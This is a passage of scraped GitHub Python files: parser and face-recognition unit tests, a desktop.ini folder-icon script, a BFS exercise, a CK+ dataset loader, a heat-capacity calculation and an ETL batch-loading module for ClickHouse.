stream_alert.rule_processor.config import load_config\nfrom stream_alert.rule_processor.parsers import get_parser\n\n\nclass TestKVParser(object):\n \"\"\"Test class for KVParser\"\"\"\n @classmethod\n def setup_class(cls):\n \"\"\"Setup the class before any methods\"\"\"\n # load config\n cls.config = load_config('test/unit/conf')\n # load JSON parser class\n cls.parser_class = get_parser('kv')\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardown the class after all methods\"\"\"\n cls.config = None\n cls.parser_class = None\n\n def parser_helper(self, **kwargs):\n \"\"\"Helper to return the parser result\"\"\"\n data = kwargs['data']\n schema = kwargs['schema']\n options = kwargs['options']\n\n kv_parser = self.parser_class(options)\n parsed_result = 
kv_parser.parse(schema, data)\n return parsed_result\n\n def test_kv_parsing(self):\n \"\"\"Parse KV - 'key:value,key:value'\"\"\"\n # setup\n schema = {\n 'name': 'string',\n 'result': 'string'\n }\n options = {\n 'separator': ':',\n 'delimiter': ',',\n }\n data = 'name:joe bob,result:success'\n\n # get parsed data\n parsed_data = self.parser_helper(data=data, schema=schema, options=options)\n\n assert_equal(len(parsed_data), 1)\n assert_equal(parsed_data[0]['name'], 'joe bob')\n","repo_name":"ip-2014/streamalert","sub_path":"test/unit/stream_alert_rule_processor/test_kv_parser.py","file_name":"test_kv_parser.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"70758829609","text":"from mock import Mock, create_autospec\r\nfrom typing import List\r\nimport numpy as np\r\n\r\nfrom facekeeper.core import (\r\n FaceKeeper,\r\n RecognizerInterface,\r\n MatcherInterface,\r\n DownloaderInterface,\r\n StorageInterface,\r\n PersonEmbedding,\r\n get_digest,\r\n)\r\n\r\n\r\ndef test_initialization():\r\n # Given\r\n recognizer_id = \"Any Recognizer ID\"\r\n embeddings: List[PersonEmbedding] = [\r\n PersonEmbedding(\"id-1\", \"Agent Smith\", np.array([1, 2, 3]), [])\r\n ]\r\n\r\n downloader = create_autospec(DownloaderInterface)\r\n matcher = create_autospec(MatcherInterface)\r\n\r\n recognizer = create_autospec(RecognizerInterface)\r\n recognizer.get_id = Mock(return_value=recognizer_id)\r\n\r\n storage = create_autospec(StorageInterface)\r\n storage.get_embeddings = Mock(return_value=embeddings)\r\n facekeeper = FaceKeeper(downloader, recognizer, storage, matcher)\r\n\r\n # When\r\n facekeeper.initialize()\r\n\r\n # Then\r\n recognizer.get_id.assert_called_once()\r\n storage.get_embeddings.assert_called_once_with(recognizer_id)\r\n matcher.add_embeddings.assert_called_once_with(embeddings)\r\n assert facekeeper.is_initialized()\r\n\r\n\r\ndef test_memorize_using_photo_with_person():\r\n \"\"\"\r\n Ensure that when we call memorize method the FaceKeeper will:\r\n 1. calculate embeddings for given image\r\n 2. store the embeddings in the Storage and\r\n 3. 
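# The test above pins down the KV parser contract: split the record on `delimiter`,
# then split each pair on `separator`, keeping keys named in the schema. The real
# StreamAlert KVParser is not shown in this extract, so this is only a behavioural
# sketch of what the test expects (toy_kv_parse is a hypothetical name):
def toy_kv_parse(schema, data, options):
    sep, delim = options['separator'], options['delimiter']
    record = {}
    for pair in data.split(delim):
        key, _, value = pair.partition(sep)
        if key in schema:
            record[key] = value
    return [record]

parsed = toy_kv_parse({'name': 'string', 'result': 'string'},
                      'name:joe bob,result:success',
                      {'separator': ':', 'delimiter': ','})
assert parsed == [{'name': 'joe bob', 'result': 'success'}]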
add them to the currently running Recognizer\r\n    \"\"\"\r\n    # Given\r\n    recognizer_id: str = \"Any Recognizer ID\"\r\n    person: str = \"John Smith\"\r\n    image: bytes = bytes([0x13, 0x00, 0x00, 0x00, 0x08, 0x00])\r\n    tags = [\"user\"]\r\n    digest = get_digest(image)\r\n    embedding: np.array = np.array([1, 2, 3])\r\n\r\n    recognizer = create_autospec(RecognizerInterface)\r\n    recognizer.get_id = Mock(return_value=recognizer_id)\r\n    recognizer.calc_embedding = Mock(return_value=embedding)\r\n\r\n    downloader = create_autospec(DownloaderInterface)\r\n    downloader.download = Mock(return_value=image)\r\n    storage = create_autospec(StorageInterface)\r\n    matcher = create_autospec(MatcherInterface)\r\n    facekeeper = FaceKeeper(downloader, recognizer, storage, matcher)\r\n\r\n    # When\r\n    facekeeper.memorize(person, \"any-url\", tags)\r\n\r\n    # Then\r\n    recognizer.get_id.assert_called_once()\r\n    recognizer.calc_embedding.assert_called_once_with(image)\r\n    matcher.add_embeddings.assert_called_once()\r\n    storage.save_embedding.assert_called_once_with(\r\n        person, digest, recognizer_id, embedding, tags\r\n    )\r\n\r\n\r\n","repo_name":"dairlair/facekeeper","sub_path":"facekeeper/tests/test_facekeeper.py","file_name":"test_facekeeper.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37238384126","text":"import os\n\n\nfolders = next(os.walk('.'))[1]\nfor folder in folders:\n    f = open(folder + \"\\\\desktop.ini\", \"w+\")\n    f.write(\"[.ShellClassInfo]\\nConfirmFileOp=0\\n\")\n    f.write(\"IconResource={},0\".format(folder + \".ico\"))\n    f.write(\"\\nIconFile={}\\nIconIndex=0\".format(folder + \".ico\"))\n    f.close()\n    os.system('attrib +r \\"{}\\\\{}\\"'.format(os.getcwd(), folder))\n    os.system('attrib +h \\"{}\\\\desktop.ini\\"'.format(folder))\n    os.system('attrib +h \\"{}\\"'.format(folder + \"\\\\\" + folder + \".ico\"))\n","repo_name":"Omar-Abdul-Azeez/Anime-Tools","sub_path":"create_desktop.ini.py","file_name":"create_desktop.ini.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18251452263","text":"'''\nTitle : Organic Cabbage (유기농 배추)\nLevel : S2\nProblem : Worms were bought to protect the cabbages from pests. A worm lives near a cabbage and eats the pests.\n          If even one worm lives on a cabbage, it can move to the adjacent cabbages, so those are protected as well.\n          Cabbages are adjacent in the four directions up, down, left and right.\n          Count how many separate patches the cabbages form to get the number of worms needed.\nType : bfs\nIdea : 1. Traverse the whole grid with a loop.\n       2. If the current value is 1 and the cell has not been visited, run bfs over the four directions to find adjacent cabbages.\n       3. Track visited cells with the visit array.\n       4. 
Repeat steps 2-3.\n'''\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nT = int(input())\n\ndr, dc = (-1,1,0,0), (0,0,-1,1)\nfor tc in range(T):\n    C,R,K = map(int, input().split())\n    board = [[0 for _ in range(C)] for __ in range(R)]\n    visit = [[False for _ in range(C)] for __ in range(R)]\n    answer = 0\n    for k in range(K) :\n        c, r = map(int, input().split())\n        board[r][c] = 1\n\n    bfs = deque()\n    for r in range(R):\n        for c in range(C):\n            if board[r][c] == 1 and visit[r][c] is False:\n                answer += 1\n                bfs.append([r, c])\n                visit[r][c] = True\n                while len(bfs) != 0:\n                    cur_r, cur_c = bfs.pop()\n                    for i in range(4):\n                        nr, nc = cur_r + dr[i], cur_c + dc[i]\n                        if 0 <= nr < R and 0 <= nc < C:\n                            if board[nr][nc] == 1 and visit[nr][nc] is False:\n                                bfs.append([nr, nc])\n                                visit[nr][nc] = True\n\n    print(answer)","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/2021/Dec/03/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38224344495","text":"\"\"\"\nAuthor(s):\n    John Boccio\nLast revision:\n    10/18/2019\nDescription:\n    API for using the \"CK+\" dataset. To use this, you must have the paths defined in the config.json. This API only uses\n    the \"peak\" emotion pictures from the dataset as those are the ones that are labeled with facial expressions.\n    Labels: 0=neutral, 1=anger, 2=contempt, 3=disgust, 4=fear, 5=happy, 6=sadness, 7=surprise\n    Since this data set has an extra label (contempt), those data points will be removed\n\n    http://www.consortium.ri.cmu.edu/ckagree/\n\"\"\"\nfrom torch.utils.data import Dataset\nfrom skimage import io\nfrom utils import DatasetType\nfrom utils import FerExpression\nimport ConfigParser as Cp\nimport os\nimport pickle\nimport torch\n\n\nclass CKDataset(Dataset):\n    __train = None\n    __test = None\n    __validation = None\n\n    def __init__(self, set_type=DatasetType.TRAIN, tf=None):\n        self.transform = tf\n        self.set_type = set_type\n\n        # Check if the dataset has already been initialized\n        if CKDataset.__train is not None \\\n                and CKDataset.__test is not None \\\n                and CKDataset.__validation is not None:\n            return\n\n        # If dataset is not initialized, check if we have it pickled\n        if os.path.exists(\"./metadata/ck/ck.pickle\"):\n            dataset = pickle.load(open(\"./metadata/ck/ck.pickle\", \"rb\"))\n            CKDataset.__train = dataset['train']\n            CKDataset.__test = dataset['test']\n            CKDataset.__validation = dataset['validation']\n            return\n\n        # Initialize it the hard way\n        data = []\n\n        ck_config = Cp.ConfigParser.get_config()[\"data_loader\"][\"CK\"]\n        # Go through the image directory and find images for the associated dataset type\n        img_dir = ck_config[\"image_dir\"]\n        emotion_dir = ck_config[\"emotion_dir\"]\n        for root, dirs, files in os.walk(img_dir):\n            for file in files:\n                img_path = os.path.join(root, file)\n                rel_img_path = img_path.replace(img_dir, '')\n\n                # Find the associated emotion\n                # Get the full path for the emotion file for this image\n                emotion_path = emotion_dir + rel_img_path\n                # The emotion file name is the same as the image file name with _emotion.txt instead of .png\n                emotion_path = emotion_path.replace(\".png\", \"_emotion.txt\")\n\n                # The emotion label only exists for peak emotions in the sequences\n                if os.path.isfile(emotion_path):\n                    with open(emotion_path) as f:\n                        emotion = int(f.readline().strip(' ')[0])\n                        emotion = CKDataset.ck_to_expression(emotion)\n                        if emotion is None:\n                            continue\n\n                    data_point = {\n                        \"img_path\": 
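# The solution above counts connected components with a flood fill. The same idea as
# a reusable helper (my own names; note it uses popleft() for true FIFO/BFS order,
# whereas the solution above pops from the right, i.e. DFS order -- both count the
# same components):
from collections import deque

def count_components(grid):
    R, C = len(grid), len(grid[0])
    seen = [[False] * C for _ in range(R)]
    components = 0
    for r in range(R):
        for c in range(C):
            if grid[r][c] == 1 and not seen[r][c]:
                components += 1
                queue = deque([(r, c)])
                seen[r][c] = True
                while queue:
                    cr, cc = queue.popleft()
                    for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                        nr, nc = cr + dr, cc + dc
                        if 0 <= nr < R and 0 <= nc < C and grid[nr][nc] == 1 and not seen[nr][nc]:
                            seen[nr][nc] = True
                            queue.append((nr, nc))
    return components

assert count_components([[1, 0, 1], [1, 0, 0], [0, 0, 1]]) == 3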
img_path,\n # Adjust the expression to match the Expression Enum\n \"expression\": emotion\n }\n data.append(data_point)\n\n # Split into train and test\n CKDataset.__train = data[:int(len(data)*.80)]\n CKDataset.__test = data[int(len(data)*.80):int(len(data)*.95)]\n CKDataset.__validation = data[int(len(data)*.95):]\n\n dataset = {'train': CKDataset.__train,\n 'test': CKDataset.__test,\n 'validation': CKDataset.__validation}\n pickle.dump(dataset, open(\"./metadata/ck/ck.pickle\", \"wb\"))\n\n def __len__(self):\n if self.set_type == DatasetType.TRAIN:\n return len(CKDataset.__train)\n elif self.set_type == DatasetType.TEST:\n return len(CKDataset.__test)\n elif self.set_type == DatasetType.VALIDATION:\n return len(CKDataset.__validation)\n return -1\n\n def __getitem__(self, item):\n if torch.is_tensor(item):\n item = item.tolist()\n\n # Deep copies so the user can't mess with the dataset\n if self.set_type == DatasetType.TRAIN:\n data = CKDataset.__train[item].copy()\n elif self.set_type == DatasetType.TEST:\n data = CKDataset.__test[item].copy()\n elif self.set_type == DatasetType.VALIDATION:\n data = CKDataset.__validation[item].copy()\n else:\n return None\n\n sample = {\n \"img\": io.imread(data[\"img_path\"]),\n \"expression\": data[\"expression\"]\n }\n\n if self.transform:\n sample = self.transform(sample[\"img\"])\n\n return sample\n\n @staticmethod\n def ck_to_expression(expression):\n if expression == 0:\n return FerExpression.NEUTRAL.value\n elif expression == 1:\n return FerExpression.ANGRY.value\n elif expression == 3:\n return FerExpression.DISGUST.value\n elif expression == 4:\n return FerExpression.FEAR.value\n elif expression == 5:\n return FerExpression.HAPPY.value\n elif expression == 6:\n return FerExpression.SAD.value\n elif expression == 7:\n return FerExpression.SURPRISE.value\n return None\n\n","repo_name":"John-Boccio/FacialExpressionRecognition","sub_path":"data_loader/CK.py","file_name":"CK.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41103158242","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 16 23:56:51 2022\n\n@author: rlg3\n\nCalculate the C_V at half of the Debye temperature\n\"\"\"\n\nimport pdos_integration as pint\nimport numpy as np\nimport json\nimport pandas as pd\nfrom jarvis.db.figshare import data as jdata\nfrom jarvis.analysis.elastic.tensor import ElasticTensor\nfrom jarvis.core.atoms import Atoms\nfrom jarvis.core.specie import Specie\n\nfrom sklearn.metrics import mean_absolute_error, r2_score\nfrom math import isnan\nfrom math import pi\n\nrun = 'run11'\nlabel = 'target'\n\nhbar = 1.0545718E-34\nkB = 1.38064852E-23\n\n\ndef mass_difference(p):\n elements = p['atoms']['elements']\n mass = []\n for sp in elements:\n mass.append(Specie(sp).atomic_mass)\n mdiff = max(mass) - min(mass)\n return mdiff\n\n\nwith open('../../' + run + '/temp/multi_out_predictions.json') as json_file:\n dos_dict = json.load(json_file)\n\nedos_pdos = jdata(\"edos_pdos\")\ndft_3d = jdata(\"dft_3d\")\n\nnorm_dos_dict = pint.transform_normalized_dos(edos_pdos, dos_dict, dos_label = 'target')\n\nnorm_dos_dict = pint.transform_normalized_dos(edos_pdos, norm_dos_dict, dos_label = 'predictions')\n\njid_list = []\ndebyeT_list = []\nmdiff_list = []\nCp_target = []\nCp_pred = []\n\ngamma_iso_target = []\ngamma_iso_pred = []\n\n'''\nLargest mass difference (heaviest atom - lightest atom)\n'''\n\n\n'''\nSpeed of sound -- might not be 
so different from Debye T?\n'''\n\nfor i in dos_dict:\n jid = i[\"id\"]\n start = jid.find('JVASP')\n end = jid.find('.vasp')\n jid = jid[start:end]\n jid_list.append(jid)\n target = np.array(i['target'])\n prediction = np.array(i['predictions'])\n freq = np.linspace(0, 1000, len(target))\n match = next(i for i in dft_3d if i[\"jid\"] == jid)\n atoms = Atoms.from_dict(match['atoms'])\n et = ElasticTensor(match['elastic_tensor'])\n debyeT = et.debye_temperature_toberer(atoms)\n debyeT_list.append(debyeT)\n mdiff = mass_difference(match)\n mdiff_list.append(mdiff)\n if not isnan(debyeT):\n Cp_target.append(pint.heat_capacity(freq, target, debyeT / 2))\n Cp_pred.append(pint.heat_capacity(freq, prediction, debyeT / 2))\n else:\n Cp_target.append(pint.heat_capacity(freq, target,300))\n Cp_pred.append(pint.heat_capacity(freq, prediction, 300))\n try:\n gamma_iso_target.append(pint.isotopic_tau(match, freq, target))\n gamma_iso_pred.append(pint.isotopic_tau(match, freq, prediction))\n except:\n gamma_iso_target.append(0)\n gamma_iso_pred.append(0)\n\n\noutput = {'JID' : jid_list, 'Cp Target' : Cp_target, 'Cp Prediction' : Cp_pred,\\\n 'DebyeT' : debyeT_list, 'Mass Difference' : mdiff_list, 'Isotope Gamma Target' : gamma_iso_target,\\\n 'Isotope Gamma Prediction' : gamma_iso_pred}\n\noutput_df = pd.DataFrame(output)\n\noutput_df.to_csv(run + 'Cp_at_half_debyeT.csv')\n\n\n\n\n\n","repo_name":"RamyaGuru/Alignn-thermal-props","sub_path":"cp_at_debyeT.py","file_name":"cp_at_debyeT.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27200167622","text":"# Functions common to all four of the fact table processing scripts.\n# Most of the functionality is in here or at least goes through here.\n# This could likely be reused as a library for other ETL tasks by updating table_info.py and dimension.py to match different ETL tasks\n\n\n# import python libraries\nimport time\nimport MySQLdb\nimport clickhouse_driver\nfrom collections import deque\n\n# import my python modules\nimport dimension\nimport table_info\n\n\n# dimension data structures like {name: dimension_object}\ndicts = {} #TODO rename this\n\n# todo probably better saving these to a file directly. \n# also adding a max error limit to avoid going through the whole dataset doing nothing\n# for error handling, unused.\nerror_rows = []\n# for expectedly skipped rows. 
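# The script above delegates to pint.heat_capacity(freq, dos, T), whose internals are
# not part of this extract. For reference, the standard harmonic-approximation heat
# capacity weights the phonon DOS g(w) by the Einstein function:
#     C = kB * integral of g(w) * x^2 * e^x / (e^x - 1)^2 dw,  with x = hbar*w/(kB*T)
# A hedged numerical sketch of that textbook formula (frequencies taken in rad/s;
# not necessarily pint.heat_capacity's exact convention or normalization):
import numpy as np

def harmonic_cv(omega, dos, T):
    hbar, kB = 1.0545718e-34, 1.38064852e-23   # same constants as defined above
    x = hbar * omega / (kB * T)
    x = np.where(x > 0.0, x, 1e-12)            # guard the w = 0 endpoint (weight -> 1 there)
    weight = x**2 * np.exp(x) / np.expm1(x)**2
    return kB * np.trapz(dos * weight, omega)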
currently also unused.\nskipped_rows = []\ndistrict_rows = []\n\n# TODO consider renaming places where dim_dict is to just dimension and similar (this file's object dicts)\n\n# mostly for backwards compatibility purposes atm\ndef _new_dim_dict(name):\n \"\"\"\n Create a dimension object and add it to this module's dimension dictionary under the name provided.\n If name is 'time', creates TimeDimension, if 'location' LocationDimension, otherwise SimpleDimension.\n\n Raises ValueError is a dimension with this name already exists in the dictionary.\n \"\"\"\n\n # todo consider checking against table_info.ALLOWED_TABLES before creating\n\n if name in dicts:\n raise ValueError(f'Dict with this name already exists: {name}')\n if name == 'time':\n dicts[name] = dimension.TimeDimension()\n elif name == 'location':\n dicts[name] = dimension.LocationDimension()\n else:\n dicts[name] = dimension.SimpleDimension()\n\n\n# consider combining with _new_dim_dict into one\ndef _ensure_dim_dict(name):\n \"\"\"Calls _new_dim_dict if a dimension with this name does not exist already.\"\"\"\n if name not in dicts:\n _new_dim_dict(name)\n\n# consider stopping supporting this functionality, it's not even that important\ndef _unwrap_wrap_args(*args):\n \"\"\"Turns arguments like ('a', ['b', 'c'], 'd') into list ['a', 'b', 'c', 'd'].\"\"\"\n out = []\n for arg in args:\n if type(arg) == list or type(arg) == tuple:\n for element in arg:\n out.append(element)\n else:\n out.append(arg)\n return out\n\ndef ensure_dim_dicts(*dimension_names):\n \"\"\"\n Creates dimension objects if ones with this name do not exist yet.\n Expected names of dimensions are in table_info.ALLOWED_TABLES.\n \"\"\"\n \n # in retrospect, accepting either a list or a *args instead of just one of them is a weird way to do things.\n dims_list = _unwrap_wrap_args(dimension_names)\n for dim in dims_list:\n _ensure_dim_dict(dim)\n\n\ndef split_line(line):\n \"\"\"Remove trailing whitespace and split on every comma\"\"\"\n return line.rstrip().split('|')\n\n\ndef create_db_table(table_name, dbcon, drop_if_exists = True):\n \"\"\"Create a table in the database using table_info.create_string[table_name].\"\"\"\n c = dbcon.cursor()\n if (drop_if_exists):\n # maybe be more carfeul with dropping in production\n # also maybe escape\n c.execute(f'DROP TABLE IF EXISTS {table_name}')\n # c.execute('DROP TABLE IF EXISTS %s', table_name)\n c.execute(table_info.create_strings[table_name])\n\n\ndef __raise_not_numeric(row_cell, row):\n raise ValueError('All elements in the fact table must be numerical to prevent SQL injection attacks.' 
+\n f'Instead found: element {row_cell} of type {type(row_cell)} in row {row}')\n\ndef _row_cell_to_numbers(row_cell, row = None):\n\n if(type(row_cell) == int or type(row_cell) == float):\n return row_cell\n else:\n # raise an exception if not a number but chceck numeric strings\n if (type(row_cell) == str):\n try:\n # throws a ValueError if string not convertible to int\n row_cell = int(row_cell)\n return row_cell\n except ValueError:\n try:\n # throw a ValueError if string not convertible to float\n row_cell = float(row_cell)\n return row_cell\n except ValueError:\n __raise_not_numeric(row_cell, row)\n else:\n __raise_not_numeric(row_cell, row)\n\ndef _raise_if_not_int_float(list_of_rows):\n # out = []\n for i,row in enumerate(list_of_rows):\n list_of_rows[i] = [_row_cell_to_numbers(row_cell) for row_cell in row]\n # print(row)\n # print(list_of_rows[i])\n # out.append(row)\n # return out\n\ndef save_batch(batch, dbcon, table_name):\n \"\"\"\n Save a batch of fact table rows into the database.\n\n CAREFUL: MAY be susceptible to SQL injection attacks. \n Does not use existing library functions to escape any characters but only accepts int or float.\n So should be safe but do procees with caution.\n \"\"\"\n\n values = list(batch)\n\n # prepare the headers part of the SQL query\n headers = table_info.headers_dict[table_name]\n headers_str = '('+ ','.join(headers) + ')'\n\n sql_base = f\"INSERT INTO {table_name} {headers_str} VALUES \"\n\n # raise an Exception if anything of type other than (float, int) comes in\n # be very careful removing the following line, will need to escape string if anything other than numbers comes in.\n # print(1)\n # values = \n _raise_if_not_int_float(values)\n # print(2)\n # print(values[:10])\n dbcon.cursor().execute(sql_base, values)\n # print(f'saved to ch')\n\n # each row in values is a tuple so str(v) is (e1, e2, e3, ...) 
already, and just put commas in between each\n # values_str = ','.join([str(v) for v in values])\n # bigsql = sql_base + values_str\n # if values_str == \"\":\n # raise Exception(\"batch was empty in save_batch\")\n # \n # dbcon.cursor().execute(bigsql)\n # dbcon.commit()\n\ndef save_batch_timed(*args):\n \"\"\"Call save_batch and time how long it took\"\"\"\n start_time = time.time()\n save_batch(*args)\n end_time = time.time()\n return end_time - start_time\n\n\n#TODO comments and better names\n\ndef _read_filestream_as_split_lines(file):\n for line in file:\n yield split_line(line)\n\ndef read_file_as_split_lines(filepath, skip_headers = True):\n with open(filepath) as file:\n if skip_headers:\n _ = next(file)\n \n yield from _read_filestream_as_split_lines(file)\n\ndef batch_process_threaded_from_file(path, skip_headers=True, **kwargs):\n batch_process_threaded_from_generator(read_file_as_split_lines(path, skip_headers), **kwargs)\n\ndef does_table_exist(table_name, dbcon):\n c = dbcon.cursor()\n c.execute(\"show tables like %s\", (table_name,))\n res = c.fetchone()\n res = res[0]\n return True if res == table_name else False\n\ndef ensure_table(table_name, dbcon, if_exists):\n if if_exists == 'replace':\n return create_db_table(table_name, dbcon)\n elif if_exists == 'append':\n if not does_table_exist(table_name, dbcon):\n # only create if it doesn't exist\n create_db_table(table_name, dbcon)\n elif if_exists == 'fail':\n if does_table_exist(table_name, dbcon):\n raise ValueError(f'Table {table_name} already exists')\n\ndef save_errors(error_rows):\n with open('error_file.txt', 'a') as file:\n # file.write('\\n')\n file.write(str([f'{time.time()}: {str(e)}\\n' for e in error_rows]))\n\ndef clear_error_file():\n with open('error_file.txt', 'w') as file:\n file.write('')\n\nimport concurrent.futures\ndef batch_process_threaded_from_generator(row_generator, row_func, fact_table_name, dbcon, if_exists='fail', **row_func_kwargs):\n start_time = time.time()\n maxlen = 4000 # 16s. 
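# The loop below overlaps work with I/O: it fills the next batch while the previous
# INSERT runs on a worker thread, and calls result() on the last future before
# submitting a new one. The core of that pattern in isolation (toy saver callback;
# the real code uses save_batch_timed and a much larger maxlen):
from collections import deque
from concurrent.futures import ThreadPoolExecutor

def drain(rows, batch_size, save):
    batch, latest = deque(maxlen=batch_size), None
    with ThreadPoolExecutor() as pool:
        for row in rows:
            batch.append(row)
            if len(batch) == batch_size:
                if latest is not None:
                    latest.result()                  # don't outrun the database
                latest = pool.submit(save, list(batch))
                batch.clear()
        if latest is not None:
            latest.result()
        if batch:                                    # flush the remainder
            pool.submit(save, list(batch)).result()

saved = []
drain(range(10), 4, saved.extend)
assert sorted(saved) == list(range(10))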
1000 21s, 10000 17s\n error_rows= []\n clear_error_file()\n batch = deque([], maxlen=maxlen)\n # also consider multiprocessing Queue - one shared queue between threads, and just save as it fills up (or like a queue of batches even)\n\n # connect if dbcon is null\n connected_here = False\n if not dbcon:\n dbcon = connect_to_db()\n connected_here = True\n\n ensure_table(fact_table_name, dbcon, if_exists)\n with concurrent.futures.ThreadPoolExecutor() as executor:\n latest_future = None\n total_insert_time = 0\n\n for row in row_generator:\n # also option of using csv.reader - slower but handles quotation marks around cells\n\n # maybe make fact_line come from a generator instead, to separate creating and saving\n try:\n fact_line = row_func(row, **row_func_kwargs)\n # except Exception as e:\n # error_rows.append((row, e))\n\n batch.append(fact_line)\n except dimension.DistrictException as de:\n district_rows.append(row)\n continue # skip the rest of the execution for this line here\n except KeyboardInterrupt as ke:\n save_errors(error_rows[:100])\n raise ke\n except Exception as e:\n error_rows.append(tuple(e, row))\n if (len(error_rows)>100):\n # too many errors\n raise e\n\n if len(batch) == maxlen:\n \n try:\n if latest_future:\n # wait up to 2 seconds for the last SQL INSERT to finish (or raise an Exception)\n time_taken = latest_future.result(3)\n total_insert_time += time_taken\n\n latest_future = executor.submit(save_batch_timed, batch, dbcon, fact_table_name)\n batch = deque([], maxlen=maxlen) # empty the queue here\n # except MySQLdb.DataError as mde:\n # error_rows.append((mde, batch))\n # except TimeoutError\n except KeyboardInterrupt as ke:\n raise ke\n except Exception as e:\n error_rows.append((e, batch))\n if (len(error_rows)>100):\n # too many errors\n raise e\n \n if error_rows and len(error_rows) >=1000:\n save_errors(error_rows)\n error_rows = []\n try:\n \n # wait for last save task to finish\n if latest_future:\n time_taken = latest_future.result(2)\n total_insert_time += time_taken\n\n # save items left in the queue after finished reading the file (e.g. if there are 9500 rows and batches are size 1000, 500 left at the end)\n if len(batch) != 0:\n latest_future = executor.submit(save_batch_timed, batch, dbcon, fact_table_name)\n time_taken = latest_future.result(2)\n total_insert_time += time_taken\n except Exception as e:\n error_rows.append(e, batch)\n\n if error_rows:\n save_errors(error_rows)\n\n # close connection if connected here\n if (connected_here):\n dbcon.close()\n end_time = time.time()\n print(f'read handle and write took {end_time - start_time} seconds to table {fact_table_name}.')\n print(f'Inserting into fact table took a total of {total_insert_time} seconds')\n pass \n\n\n# TODO rename this\n# TODO refactor needed, there is a lot of deeply nested function calls where each don't really add anything \ndef batch_process(path, row_func, fact_table_name, dbcon=None, **kwargs):\n \"\"\"Process file at path. 
See batch_process_threaded\"\"\"\n batch_process_threaded_from_file(path=path, skip_headers=True, row_func=row_func, fact_table_name=fact_table_name, dbcon=dbcon, if_exists='replace', **kwargs)\n pass\n\n\ndef save_dim(name, dbcon = None):\n \"\"\"Wrapper for Dimension.to_sql, also creates connection if dbcon null\"\"\"\n db_connected_here = False\n if not dbcon:\n dbcon = connect_to_db()\n db_connected_here = True\n\n dicts[name].to_sql(name, dbcon)\n if db_connected_here:\n dbcon.commit()\n dbcon.close()\n\ndef save_dims():\n \"\"\"Save all the created dimensions into SQL database\"\"\"\n dbcon = connect_to_db()\n for name in dicts.keys():\n save_dim(name, dbcon)\n dbcon.commit()\n dbcon.close()\n\nclass ClickhouseCursorClient:\n def __init__(self, client):\n self.client = client\n def cursor(self):\n return self\n def commit(self):\n pass\n def close(self):\n self.client.disconnect()\n def execute(self, *args, **kwargs):\n return self.client.execute(*args, **kwargs)\n def executemany(self, sql, values):\n sqlnoval = sql.split('%')[0][:-1]\n return self.client.execute(sqlnoval, values)\n print(sql)\n print(values)\n\ndbpassword = None\n\ndef getDbPassword():\n if dbpassword:\n return dbpassword\n else:\n dbpassword = input(\"Please enter the database password \")\n return dbpassword\n# TODO make this adjustable\ndef connect_to_db():# -> MySQLdb.Connection:\n \"\"\"Get MySQLdb connection to default database.\"\"\"\n db = clickhouse_driver.Client(host='localhost', password = dbpassword, database='sgov')\n db = ClickhouseCursorClient(db)\n # db = MySQLdb.connect(host='localhost:9004',user='temp_user', passwd = 'password', database='sgov')\n # import psycopg2\n # db = psycopg2.connect(database='sgov_mini', user='temp_user', password='password')\n # c = db.cursor()\n return db\n\ndef get_sqlalchemy_con():\n \"\"\"Get SQLAlchemy engine for the database\"\"\"\n import sqlalchemy\n return sqlalchemy.create_engine('clickhouse://', creator= lambda :connect_to_db().client)\n # return sqlalchemy.create_engine('mysql://', creator=connect_to_db)\n\ndef get_sql_alchemy_con_for_read():\n import sqlalchemy\n return sqlalchemy.create_engine(f'clickhouse+native://default:{dbpassword}@localhost:8123')\n return sqlalchemy.create_engine('clickhouse://', creator= lambda :connect_to_db())\n\n# A lot of wrapper functions which are mostly here for historic purposes. But may be good to keep anyway in case changes are wanted.\n#TODO change explicit args to *args or **kwargs\n\ndef add_to_dict_if_not_in(dict_name, key, values: list):\n \"\"\"Wrapper function for dimension.add_if_not_in. Takes in name of dim as stored in dicts here\"\"\"\n return dicts[dict_name].add_if_not_in(key, values)\n\n \ndef handle_one_dim(dict_name, row, row_index):\n \"\"\"Wrapper for SimpleDimension.add_row. Takes in name of dim as stored in dicts here\"\"\"\n return dicts[dict_name].add_row(row, row_index)\n\ndef handle_time(row, index = 0):\n \"\"\"Wrapper for TimeDimension.add_row. Takes in name of dim as stored in dicts here\"\"\"\n return dicts['time'].add_row(row, index)\n\ndef handle_loc(row, loc_level_idx = 4, loc_idx = 5, smallest_area_name = 'POSTCODE_SECTOR', skip_bigger_area_rows=False):\n \"\"\"Wrapper for LocationDimension.add_row. 
